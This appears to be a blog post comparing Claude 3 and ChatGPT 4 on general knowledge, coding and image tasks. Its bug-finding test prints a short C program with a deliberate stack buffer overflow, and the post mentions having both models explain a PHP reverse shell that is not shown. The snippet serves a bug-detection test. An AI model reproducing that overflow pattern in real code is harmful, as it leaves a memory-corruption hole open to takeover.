Claude 3, one of the natural language processing AI developed by Anthropic has made a breakthrough defeating today’s standard ChatGPT 4.0. Previously we had an article explaining the benchmark and Claude 3 models.
But that was the on-paper result. Here we’ll test the Claude 3 (Opus, Sonnet) model and compare it with ChatGPT 4.0. And we’ll see if it is as better as it claims.
These tests will be divided into 3 sections, general, code, and image analysis. Let’s get into it.
If you haven’t already, make sure to check our article on Claude 3. It’s a high-level rundown that covers its benchmark performance and other dope info you’ll wanna know.
General
Here, we will perform a few tests to see the response style and overall knowledge of a model. First well ask it a few general questions.
Prompt: “Who won the Nobel Prize in Physics in 2020?”
Here both GPT 4 and Claude 3 – Sonnet were able to give the right answer.
Next, we’ll let GPT 4 and sonnet translate the output into Chinese. This looks like both AIs were able to translate English to Chinese and vice versa while keeping the meaning intact.
Next, we tried out some basic riddles. And in most cases, both AI (GPT 4; Sonnet) responded the same.
We have performed a lot of other tests on reasoning, logic, basic math, suggestions in real life, and more. In most cases, the GPT 4 and Claude 3 sonnets were responding the same, whereas Claude 3, sonnet, and opus had a better output. The output from Claude 3 models felt more human-like compared to GPT 4. We decided not to include them here since it was almost the same output.
Code
In this test, we’ll ask ChatGPT and Claude to create scripts for automating tasks. They will be tasked with converting a program from one language to another while preserving its functionality. Additionally, they will be required to analyze code, identify bugs, and provide explanations. These tests won’t be intensive but will cover general tasks that a coder might need.
Test 1 – Creating Automation Scripts
First, we’ll ask ChatGPT 4.0 to create a Python script that takes URLs from a text file, captures full-page screenshots of those URLs, and saves them as PNG files.”
Prompt: “Make me a python script that will automatically browse the URLs from a txt file and take full screenshots of the webpage also top to bottom and save it in a png file.”
Just copy-pasting the script into a file and running it gives us some errors as below.
Passing this error to ChatGPT, it suggested installing the Chrome browser or using Firefox instead. In the next prompt, I asked it to do it in Firefox since I already had Google Chrome installed.
This time it gave me a few instructions to install `geckodriver`. So, I installed it and ran the new script.
Now the script worked and I got the images I wanted in the current directory.
Claude 3 – Opus
Doing the same thing with Claude 3 opus gives the code and instructions on what needs to be done before executing this script. The code from Claude 3 opus seems much easier to understand compared to GPT 4.
Running this code without modifying or changing anything works on the first try. And it works using Chrome, not Firefox. The screenshots are also saved in a new directory this time.
While the images it captured are proper but the screen size was smaller than ChatGPT. But that was also fixed the next time mentioned.
Test 2 – Converting language
In this test, we will convert a Java program to a Go program that converts a string into an md5 hash. We started with ChatGPT with the prompt “can you convert the code behavior in go language “`code“`”.
It delivered a code that converts the string to MD5. And it worked on the first go.
Claude 3 – Opus
Using the same prompt in Claude 3 opus gives the code with a better explanation than GPT 4 has provided. Here claude 3 also gives the code output of the string provided.
And it’s no daydreaming it’s the actual hash of the string provided.
Test 3 – Check for bugs
In this test, we are going to give it a C code with a buffer overflow bug. This is a very common bug that often leads to RCE and total system compromise.
Prompt: “is there any bug in my code “`#include <stdio.h>
int main() {
int secret = 0xdeadbeef;
char name[100] = {0};
read(0, name, 0x100);
if (secret == 0x1337) {
puts(“Wow! “);
} else {
puts(“Hello”);
}
}“`”
ChatGPT was able to get the bug and also where it occurs.
Claude 3 – Opus
Just like ChatGPT Claude 3 was also able to detect the vulnerability but in addition to that it read the entire code and its behaviour. It also provided a bug-free version of the code.
Test 4 – Analyze the code
In this test, we’ll provide ChatGPT a PHP reverse shell and ask it for details on it. The prompt used here is “can you tell me whats going on here in details “`code“`”.
This is explained by groping the actions. It was also able to detect the reverse shell.
Claude 3 – Opus
Using the same prompt with Opus gives us a much better explanation than ChatGPT. Here the explanation is given in points instead of grouping. It was also able to detect that reverse shell.
Image Analysis
In image analysis, we’ll check for facial recognition, detect multiple subjects from an image, and also detect geo-locations.
Test 1 – Facial Recognition
Here we provided an image of the Mona Lisa and prompted “Do you know him?” the “him” part was intentional. Both ChatGPT 4 and Claude 3 Sonnet were able to recognize the image as Monalisa.
Next, we provided an image of Obama without asking any questions. Here GPT 4 didn’t recognize the image, but it recognized after asking about the person in the image.
But Claude 3 Sonnet recognized it just from the image.
Test 2 – Recognizing multiple subjects
In this test, we provided an image containing 7 animals together and asked both AI to count the total number and identify the animals.
Here both AI missed the total number but GPT 4 provided a wrong name.
Next, we tested with an image that had multiple shapes in it.
Here ChatGPT 4 missed one shape while Claude 3 Sonnet was able to detect all 9 shapes in the image.
Test 3 – Checking GEO Locations
In this test, we provided a map image with a mark in Indonesia and asked both AIs to recognize the country. ChatGPT 4 failed the test unable to recognize the map.
While Claude 3 – Sonnet was able to detect the country properly.
This is done in Amazon Bedrock client but the model is the same as you will get on the official website. Amazon Bedrock allows you to use multiple AIs in one place.
We have made some other tests with images. In most cases, the Claude 3 Sonnet answer was better than GPT 4. Claude 3 could understand the meaning of a question better than ChatGPT 4.
Conclusions
After performing a lot of tests with both AI, including general tasks, coding, logic, analysis, reasoning, and more, it’s visible that Claude 3 is better than chatGPT 4. It can keep a tone that feels like talking to a human, can understand the true meaning behind questions, and provide appropriate answers.
But ChatGPT still provides more than Claude 3. You can browse the internet with GPT 4, generate images, and make your custom BOT in the ChatGPT console. But as soon as Claude 3 adopts these features, I see no reason to use ChatGPT. Because the subscription cost of both AI is the same.
In conclusion, both AI works great. You should use both and select what best works for you. I’ve been using GPT 4 since it was released and I’m still using it every day. But if OpenAI dont bring any update that beats Calude 3. I’ll most likely switch. Thank you for reading.
Comments